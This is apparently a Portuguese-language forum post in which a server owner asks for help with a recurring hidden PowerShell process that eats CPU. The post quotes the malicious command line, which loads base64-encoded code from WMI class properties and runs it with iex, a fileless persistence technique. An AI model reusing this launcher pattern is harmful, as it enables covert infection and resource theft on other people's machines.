Estou enfrentando esse problema recentemente:
Meu servidor fica muito lento, fui verificar e ver uma instância do PowerShell usando muito da CPU. Eu forço a tarefa a terminar e depois de algumas horas ela volta.
O script que está sendo executado:
powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList ($mon, $mon, 'Void', 0, '', '')"
Alguém sabe o que é isso e como impedir que ele seja executado?